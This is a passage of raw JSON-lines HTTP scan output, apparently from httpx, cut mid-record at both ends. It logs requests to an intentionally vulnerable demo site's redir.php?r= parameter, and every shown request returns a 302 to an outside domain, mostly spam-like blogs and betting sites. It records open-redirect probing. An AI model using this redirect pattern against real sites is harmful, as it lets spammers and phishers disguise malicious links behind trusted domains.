m/redir.php?r=http://livebettingo4e.fredsgivingday.com/bet-online-for-tips-1971/\",\"location\":\"http://livebettingo4e.fredsgivingday.com/bet-online-for-tips-1971/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://livebettingo4e.fredsgivingday.com/bet-online-for-tips-1971/\",\"time\":\"339.910094ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:47.838113126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://livebusinessblog.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://livebusinessblog.com/\",\"location\":\"http://livebusinessblog.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://livebusinessblog.com/\",\"time\":\"360.836442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:48.228658413Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://liveguestnews.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://liveguestnews.blogspot.com/\",\"location\":\"http://liveguestnews.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://liveguestnews.blogspot.com/\",\"time\":\"352.868612ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:48.620454387Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://livematchipl.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://livematchipl.com/\",\"location\":\"http://livematchipl.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://livematchipl.com/\",\"time\":\"338.631791ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:48.659045892Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://lookupblogbgeg.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://lookupblogbgeg.blogspot.com/\",\"location\":\"http://lookupblogbgeg.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://lookupblogbgeg.blogspot.com/\",\"time\":\"352.499277ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:48.839601531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://lookupblogbgeg.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://lookupblogbgeg.blogspot.com/management.html\",\"location\":\"http://lookupblogbgeg.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://lookupblogbgeg.blogspot.com/management.html\",\"time\":\"351.8363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:49.376590842Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://lpnews187.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://lpnews187.blogspot.com/\",\"location\":\"http://lpnews187.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://lpnews187.blogspot.com/\",\"time\":\"343.705083ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:49.429640951Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ltnews187.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ltnews187.blogspot.com/\",\"location\":\"http://ltnews187.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ltnews187.blogspot.com/\",\"time\":\"352.884681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:51.153509209Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://macbookkeyboardscoza.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://macbookkeyboardscoza.blogspot.com/\",\"location\":\"http://macbookkeyboardscoza.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://macbookkeyboardscoza.blogspot.com/\",\"time\":\"360.665131ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:52.410833732Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://macbookkeyboardscoza.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://macbookkeyboardscoza.blogspot.com/management.html\",\"location\":\"http://macbookkeyboardscoza.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://macbookkeyboardscoza.blogspot.com/management.html\",\"time\":\"356.010681ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:52.463760219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://magazinemodule.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://magazinemodule.com/\",\"location\":\"http://magazinemodule.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://magazinemodule.com/\",\"time\":\"356.945504ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:52.795098295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mainceme.biz/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mainceme.biz/\",\"location\":\"http://mainceme.biz/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mainceme.biz/\",\"time\":\"342.081139ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:53.626200326Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com\",\"location\":\"http://makeahealthylifelontime.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://makeahealthylifelontime.blogspot.com\",\"time\":\"354.771184ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:53.643112202Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/\",\"location\":\"http://makeahealthylifelontime.blogspot.com.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/\",\"time\":\"350.480039ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:53.702513685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mashreq.edu.sd\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mashreq.edu.sd\",\"location\":\"http://mashreq.edu.sd\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mashreq.edu.sd\",\"time\":\"343.680224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:53.716945136Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/management.html\",\"location\":\"http://makeahealthylifelontime.blogspot.com.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://makeahealthylifelontime.blogspot.com.blogspot.com/management.html\",\"time\":\"360.276292ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.031222379Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mashreq.edu.sd/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mashreq.edu.sd/\",\"location\":\"http://mashreq.edu.sd/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mashreq.edu.sd/\",\"time\":\"356.071242ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.087055141Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://meshgeocom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://meshgeocom.blogspot.com/\",\"location\":\"http://meshgeocom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://meshgeocom.blogspot.com/\",\"time\":\"344.061881ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.090489727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://meshgeocom.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://meshgeocom.blogspot.com/management.html\",\"location\":\"http://meshgeocom.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://meshgeocom.blogspot.com/management.html\",\"time\":\"344.232685ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.180182426Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mojerandkis.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mojerandkis.blogspot.com\",\"location\":\"http://mojerandkis.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mojerandkis.blogspot.com\",\"time\":\"354.91914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.205870696Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mtngeoreportci.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mtngeoreportci.blogspot.com/\",\"location\":\"http://mtngeoreportci.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mtngeoreportci.blogspot.com/\",\"time\":\"356.110027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.297356656Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mtngeoreportci.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mtngeoreportci.blogspot.com/management.html\",\"location\":\"http://mtngeoreportci.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mtngeoreportci.blogspot.com/management.html\",\"time\":\"348.817238ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.349273029Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mtpolice.kr/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mtpolice.kr/management.html\",\"location\":\"http://mtpolice.kr/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mtpolice.kr/management.html\",\"time\":\"353.223172ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.401161684Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://mysqmclub.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://mysqmclub.com//\",\"location\":\"http://mysqmclub.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://mysqmclub.com//\",\"time\":\"339.783875ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.47928293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://naszefilmyxd.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://naszefilmyxd.blogspot.com/\",\"location\":\"http://naszefilmyxd.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://naszefilmyxd.blogspot.com/\",\"time\":\"352.749369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.535162502Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com\",\"location\":\"http://netfreewebb.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://netfreewebb.blogspot.com\",\"time\":\"350.606861ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.60323198Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com/\",\"location\":\"http://netfreewebb.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://netfreewebb.blogspot.com/\",\"time\":\"338.850387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:54.71009858Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://netfreewebb.blogspot.com/management.html\",\"location\":\"http://netfreewebb.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://netfreewebb.blogspot.com/management.html\",\"time\":\"342.379327ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:57.875705253Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://newfilmys.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://newfilmys.blogspot.com/\",\"location\":\"http://newfilmys.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://newfilmys.blogspot.com/\",\"time\":\"343.658892ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:58.08534268Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://newikus.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://newikus.blogspot.com\",\"location\":\"http://newikus.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://newikus.blogspot.com\",\"time\":\"354.55976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:58.133499006Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://newikus.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://newikus.blogspot.com/\",\"location\":\"http://newikus.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://newikus.blogspot.com/\",\"time\":\"353.488122ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:58.185051177Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://newysk.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://newysk.blogspot.com\",\"location\":\"http://newysk.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://newysk.blogspot.com\",\"time\":\"343.492219ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:58.582709912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://newysk.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://newysk.blogspot.com/\",\"location\":\"http://newysk.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://newysk.blogspot.com/\",\"time\":\"351.684566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:58.978193166Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://nftcalendar.wiki/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://nftcalendar.wiki/\",\"location\":\"http://nftcalendar.wiki/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://nftcalendar.wiki/\",\"time\":\"356.469249ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:59.014380267Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://niussa.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://niussa.blogspot.com\",\"location\":\"http://niussa.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://niussa.blogspot.com\",\"time\":\"353.224449ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:59.195141096Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://novusinfini.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://novusinfini.com/\",\"location\":\"http://novusinfini.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://novusinfini.com/\",\"time\":\"353.044433ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:59.732070973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://nuancesjournal.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://nuancesjournal.com/\",\"location\":\"http://nuancesjournal.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://nuancesjournal.com/\",\"time\":\"353.123456ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\"